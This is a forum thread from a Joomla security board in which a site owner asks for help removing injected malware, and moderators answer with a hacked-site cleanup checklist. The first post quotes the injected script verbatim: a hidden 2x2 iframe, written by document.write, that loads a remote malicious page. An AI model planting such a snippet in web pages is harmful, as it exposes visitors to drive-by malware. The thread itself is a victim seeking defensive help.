The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 4 posts ] 
  Print view Previous topic | Next topic 
Author Message
ameic
PostPosted: Wed May 30, 2012 12:39 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Mar 12, 2012 9:09 am
Posts: 2
Problem Description :: Forum Post Assistant (v1.2.1) : 30th May 2012 wrote:
when I check the source code of the site I see the code "iFrame Malware (<script type="text/javascript">document.write('<iframe src="http://rec-creations.xxx/adv.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script>) followed by the malware code (really long)
Log/Error Message :: Forum Post Assistant (v1.2.1) : 30th May 2012 wrote:
Google Chome says Warning: Something's Not Right Here!
Actions Taken To Resolve by Forum Post Assistant (v1.2.1) 30th May 2012 wrote:
Ive copied my entire site to my hdd and searched for the iframe string but cant find anything
Forum Post Assistant (v1.2.1) : 30th May 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.20-Stable (senu takaa) 18-July-2010
Joomla! Configured :: Yes | Writable (644) | Owner: ameic (uid: 891991/gid: 235038) | Group: pg863176 (gid: 235038) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 1 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32.8-grsec-2.1.14-modsign-xeon-64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/ameic/melbourneanimalrescue.org | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 7M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 90M

MySQL Configuration :: Version: 5.1.53-log (Client:5.0.51a) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 4.89 MiB | #of _FPA_TABLE: 47
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | iconv () | standard (5.2.17) | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | pcntl () | SPL (0.2) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | posix () | pspell () | Reflection (0.1) | imap () | mysqli (0.1) | sockets () | SQLite (2.0-dev) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi-fcgi () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip | suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Extensions Discovered :: wrote:
Components :: SITE :: MailTo (1.5.0) | Wrapper (1.5.0) | User (1.5.0) | WF_TABLE_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_YOUTUBE_TITLE (2.0.21) |
Components :: ADMIN :: User Manager (1.5.0) | Newsfeeds (1.5.0) | Form Maker (1.1.2) | Trash (1.0.0) | Module Manager (1.5.0) | Frontpage (1.5.0) | Messaging (1.5.0) | Media Manager (1.5.0) | Plugin Manager (1.5.0) | Control Panel (1.5.0) | Search (1.5.0) | Content Page (1.5.0) | Installation Manager (1.5.0) | Language Manager (1.5.0) | Contact Items (1.0.0) | Polls (1.5.0) | Template Manager (1.5.0) | ImageShow (2.4.0) | Mass Mail (1.5.0) | Menus Manager (1.5.0) | Configuration Manager (1.5.0) | Cache Manager (1.5.0) | Weblinks (1.5.0) | Editor - JCE (2.0.21) | Unknown (-) | JCE (2.0.21) | Banners (1.5.0) |

Modules :: SITE :: Feed Display (1.5.0) | Who\'s Online (1.0.0) | Custom HTML (1.5.0) | Facebook Like Box (2.2) | Banner (1.5.0) | Sections (1.5.0) | Menu (1.5.0) | Newsflash (1.5.0) | Facebook FanBox (1.5.x.0) | Most Read Content (1.5.0) | Wrapper (1.0.0) | Search (1.0.0) | Login (1.5.0) | Footer (1.5.0) | Archived Content (1.5.0) | Random Image (1.5.0) | Form Maker Module (1.1.2) | Syndicate (1.5.0) | Latest News (1.5.0) | JSN ImageShow (2.3.4) | Related Items (1.0.0) | Breadcrumbs (1.5.0) | Statistics (1.5.0) | Poll (1.5.0) |
Modules :: ADMIN :: Unread Items (1.0.0) | Feed Display (1.5.0) | Online Users (1.0.0) | Toolbar (1.0.0) | Custom HTML (1.5.0) | Popular Items (1.0.0) | Title (1.0.0) | Latest News (1.0.0) | Logged in Users (1.0.0) | Admin Submenu (1.0.0) | Login Form (1.0.0) | User Status (1.5.0) | Footer (1.0.0) | Admin Menu (1.0.0) | Quick Icons (1.0.0) | Items Stats (1.0.0) |

Plugins :: SITE :: XML-RPC - Blogger API (1.0) | XML-RPC - Joomla API (1.0) | System - Mootools Upgrade (1.5) | System - SEF (1.5) | System - Remember Me (1.5) | System - Debug (1.5) | System - Backlinks (1.5) | System - Cache (1.5) | System - Log (1.5) | System - JSN ImageShow (2.3.4) | System - Legacy (1.5) | Authentication - LDAP (1.5) | Authentication - OpenID (1.5) | Authentication - GMail (1.5) | Authentication - Joomla (1.5) | Authentication - Example (1.5) | Content - Vote (1.5) | Content - Code Highlighter (Ge (1.5) | Content - Pagebreak (1.5) | Content - Load Form Maker (1.1.2) | Content - Page Navigation (1.5) | Content - Email Cloaking (1.5) | jLike (1.0.7) | Content - Load Modules (1.5) | Content - JSN ImageShow (2.3.4) | Content - Example (1.0) | Search - Sections (1.5) | Search - Content (1.5) | Search - Categories (1.5) | Search - Newsfeeds (1.5) | Search - Weblinks (1.5) | Search - Contacts (1.5) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | Button - Image (1.0.0) | User - Joomla! (1.5) | User - Example (1.0) | Editor - JCE (2.0.21) | Editor - XStandard Lite for Jo (1.0) | Editor - TinyMCE 3 (3.2.6) |
Templates Discovered :: wrote:
Templates :: SITE :: JA_Purity (1.2.0) | ds_busuit (1.0.0) | beez (1.0.0) | JSN_Epic_FREE (3.6) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |


I've searched for days for this code and although I can see it when I look at the pages source code I can't find it in any of the php .js and html files... I run this site on behalf of a non profit dog shelter, please help


Last edited by mandville on Wed May 30, 2012 12:50 pm, edited 1 time in total.
broke link to malicious site


Top
 Profile  
 
mandville
PostPosted: Wed May 30, 2012 12:59 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11706
Location: The Girly Side of Joomla in Sussex
please follow the listed procedure for dealing with hacked sites, security checklist 7

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
ameic
PostPosted: Thu May 31, 2012 10:05 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Mar 12, 2012 9:09 am
Posts: 2
Hi, I'll complete the checklist as advise, however please advise where the code can have been injected into the site
Top
 Profile  
 
PhilD
PostPosted: Mon Jun 04, 2012 6:26 pm 
User avatar
Joomla! Hero
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2702
Location: Wisconsin USA
mandville wrote:
please follow the listed procedure for dealing with hacked sites, security checklist 7


Anywhere.

That is the reason for following the checklist.

Also your Joomla install (Joomla! 1.5.20) is way out of date and has security issues.

Follow:
PhilD wrote:

Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.

You must state what version of Joomla you were using when when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the security Checklist 7 link below.

Note: The forum post tool will work with all versions of Joomla.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 4 posts ] 


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Who is online

Users browsing this forum: No registered users and 17 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group